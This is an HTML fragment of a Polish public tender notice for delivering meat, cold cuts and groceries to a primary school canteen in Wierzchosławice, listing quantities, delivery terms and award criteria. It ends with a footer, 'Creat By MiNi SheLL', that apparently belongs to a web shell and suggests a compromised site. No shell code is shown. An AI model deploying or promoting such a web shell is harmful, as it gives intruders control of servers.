class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa mięsa wieprzowego i drobiowego do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1	Kark wp b/k kl.1	250	kg<br/>2	Łopatka b/k	100	kg<br/>3	Polędwiczka wieprzowa	350	kg<br/>4	Schab wp b/k	420	kg<br/>5	Słonina bez skóry	40	kg<br/>6	Szynka surowa wp z/k bez skóry i biodrówki kl. 1	800	kg<br/>7	Żeberka wp paski, trójkąty	500	kg<br/>8	Filet z indyka b/s i b/k	400	kg<br/>9	Filet z kurczaka b/s i b/k	550	kg<br/>10	Kurczak świeży	400	kg<br/>11	Udko z kurczaka	300	kg<br/>12	Dramstik z kurczaka	200	kg<br/>13	Skrzydło z indyka	350	kg<br/>14	Szyja z indyka	250	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e-mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa mięsa wołowego do stołówki szkolnej Szkoły Podstawowej im.100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Rostbef wołowy b/k kl.1 100 kg<br/>2. Szponder wołowy b/k 100 kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e-mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15110000-2 - Mięso</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa wędlin wieprzowych i drobiowych do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1	Kiełbasa wiejska 80	kg<br/>2	Kiełbasa zwyczajna 80	kg<br/>3	Parówki z szynki op. 5 szt.	500	szt.<br/>4	Podgardle wędzone 20	kg<br/>5	Boczek wędzony	45	kg<br/>6	Schab z Lubinki	70	kg<br/>7	Sopocka tradycyjna 80	kg<br/>8	Szynka wiejska	90	kg<br/>9	Indyk z Bobrownik 100	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 6.00÷9.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e-mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15130000-8 - Produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywna dostawa pozostałych artykułów spożywczych do stołówki szkolnej Szkoły Podstawowej im. 100-lecia Ruchu Ludowego w Wierzchosławicach.<br/><br/>Zakres:<br/>1. Ananasy w syropie	60	szt.<br/>2. Bazylia 1	kg<br/>3. Brzoskwinie w syropie	160	szt.<br/>4. Chrupki kukurydziane 85g	100	szt.<br/>5. Chrupki kukurydziane pałeczki 50g	100 szt.<br/>6. Chrzan tarty	100	szt.<br/>7. Cukier kryształ	800	kg<br/>8. Cukier puder	100	kg<br/>9. Curry	40	szt.<br/>10. Cynamon 3	kg<br/>11. Czekolada	120	szt.<br/>12. Czosnek granulowany 3	kg<br/>13. Dżem niskosłodzony 280g	500	szt.<br/>14. Dżem niskosłodzony 840g	60	szt.<br/>15. Ekstrakt naturalny wanilia 30 ml	30	szt.<br/>16. Gałka muszkatołowa	20	szt.<br/>17. Groszek ptysiowy 125g	400	szt.<br/>18. Groszek ptysiowy	30	kg<br/>19. Groszek zielony konserwowy	100	szt.<br/>20. Herbata expressowa	50	szt.<br/>21. Herbata owocowa	2000	szt.<br/>22. Herbatniki pełnoziarniste min 300g	250	szt.<br/>23. Jaja świeże rozmiar L	7000	szt.<br/>24. Imbir	20	szt.<br/>25. Kakao naturalne 150g	140	szt.<br/>26. Kasza gryczana	10	kg<br/>27. Kasza jaglana	80	kg<br/>28. Kasza jęczmienna 100	kg<br/>29. Kasza kukurydziana	40	kg<br/>30. Kasza kuskus	100	kg<br/>31. Kasza manna	90	kg<br/>32. Kasza pęczak	60	kg<br/>33. Kawa zbożowa, bezkofeinowa	140	szt.<br/>34. Ketchup 480g	100	szt.<br/>35. Kminek cały	30	szt.<br/>36. Kminek mielony 4	kg<br/>37. Koncentrat pomidorowy 900 - 1000g	80	szt.<br/>38. Kukurydza konserwowa	200	szt.<br/>39. Liść laurowy 100g	5	szt.<br/>40. Majeranek suszony 200g	6	szt.<br/>41. Majonez 700g	100	szt.<br/>42. Makaron różne kształty	700	kg<br/>43. Makaron różne kształty razowy	70	kg<br/>44. Mąka pszenna	500	kg<br/>45. Mąka ziemniaczana	45	kg<br/>46. Miód 1400g	80	szt.<br/>47. Mleczko kokosowe	30	szt.<br/>48. Morele suszone	50	szt.<br/>49. Mus owocowy/warzywny/z dodatkiem płatków zb.	3500	szt.<br/>50. Musztarda	60	szt.<br/>51. Napój owsiany 1l	200	szt.<br/>52. Ocet	20	szt.<br/>53. Ogórki konserwowe 1700ml	50	szt.<br/>54. Olej roślinny	400	litry<br/>55. Olej roślinny z ziołami i warzywami	30	szt.<br/>56. Oliwa z oliwek 1 l	30	szt.<br/>57. Oliwki zielone i czarne 0,9l - cała / krojona	20	szt.<br/>58. Oregano 200g	6	szt.<br/>59. Panierka Panko 1kg	30	szt.<br/>60. Papryka czerwona słodka wędzona 8	kg<br/>61. Papryka słodka mielona czerwona 12 kg<br/>62. Pieprz cytrynowy 20g	80	szt.<br/>63. Pieprz czarny mielony	6	kg<br/>64. Pieprz ziołowy 20g	60	szt.<br/>65. Płatki czekoladowe 70	kg<br/>66. Płatki kukurydziane	70	kg<br/>67. Płatki zbożowe	100	kg<br/>68. Podpłomyk 150	szt.<br/>69. Pomidory krojone bez skórki 2500ml	80	szt.<br/>70. Pomidory suszone 250g - słoik	80	szt.<br/>71. Pulpa pomidorowa 4kg	30	szt.<br/>72. Powidło śliwkowe 290 g	100	szt.<br/>73. Powidło śliwkowe 930 g	20	szt.<br/>74. Przyprawa uniwersalna 150g	300	szt.<br/>75. Rodzynki 3	kg<br/>76. Rozmaryn	20	szt.<br/>77. Ryż basmati 50	kg<br/>78. Ryż biały długoziarnisty, brązowy	150	kg<br/>79. Ryż biały paraboliczny	150	kg<br/>80. Sałatka z czerwonej kapusty	220	szt.<br/>81. Seler konserwowy 0,9l	20	szt.<br/>82. Słonecznik łuskany	4	kg<br/>83. Soczek w butelce 300ml	1200	szt.<br/>84. Sól kamienna jodowana	220	kg<br/>85. Śliwka kalifornijska	5	kg<br/>86. Tymianek 10g	40	szt.<br/>87. Wafle ryżowe	90	szt.<br/>88. Wafle tortowe niskocukrowe	50	szt.<br/>89. Wiórki kokosowe 100g	30	szt.<br/>90. Woda mineralna	2500	szt.<br/>91. Ziele angielskie 15g	60	szt.<br/>92. Zioła prowansalskie	30	szt.<br/>93. Żurawina 12	kg<br/>94. Żurek na wodzie źródlanej	210	szt.<br/>95. Łuskane pestki dyni	5	kg<br/><br/>Gotowość realizacji dostaw: min 2 - max 5 razy w tygodniu (w dni robocze) w godz. 7.00 ÷ 10.00 na koszt wykonawcy po wcześniejszym zamówieniu w formie telefonicznej lub pisemnej (e mailem na adres Wykonawcy).<br/><br/>Adres dostawy: 33-122 Wierzchosławice 97. Koszt dostawy wliczony w cenę towaru. Zamówienia będą składane przez Zamawiającego najpóźniej do godz. 14:00 dnia poprzedzającego dostawę. Czas rozpatrzenia reklamacji nie dłużej niż 72 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15330000-0 - Przetworzone owoce i warzywa</p> <p class="mb-0">15870000-7 - Przyprawy i przyprawy korzenne</p> <p class="mb-0">15830000-5 - Cukier i produkty pokrewne</p> <p class="mb-0">15860000-4 - Kawa, herbata i podobne produkty</p> <p class="mb-0">15840000-8 - Kakao; czekolada i wyroby cukiernicze</p> <p class="mb-0">15410000-5 - Surowe oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15610000-7 - Produkty przemiału ziarna</p> <p class="mb-0">15851100-9 - Makaron niegotowany</p> <p class="mb-0">03142500-3 - Jaja</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas rozpatrzenia reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oferta złożona przez spółkę cywilną traktowana jest jako oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy, w stosunku do treści oferty, w zakresie:<br/>1) urzędowej zmiany stawki podatku od towarów i usług (VAT), jeżeli zmiana stawki podatku od towarów i usług (VAT) powodować będzie zwiększenie lub zmniejszenie należnego wynagrodzenia Wykonawcy z umowy, (kosztów umowy po stronie Wykonawcy), Zamawiający dopuszcza zwiększenie lub zmniejszenie wynagrodzenia o kwotę równą różnicy w kwocie podatku naliczonego przez Wykonawcę;<br/>2) zmiany nazwy, adresu, formy organizacyjno - prawnej itp. którejkolwiek ze stron;<br/>3) sytuacji, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tj. nieodnoszących się do warunków, które gdyby zostały ujęte w ramach pierwotnej procedury udzielania zamówienia, umożliwiłyby dopuszczenie innej oferty niż ta, która została pierwotnie dopuszczona.<br/>2. Zmiana umowy na wniosek Wykonawcy wymaga wykazania okoliczności uprawniających do dokonania tej zmiany.<br/>3. Wszelkie zmiany postanowień zawartej Umowy mogą nastąpić wyłącznie na piśmie pod rygorem nieważności tych zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-11 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com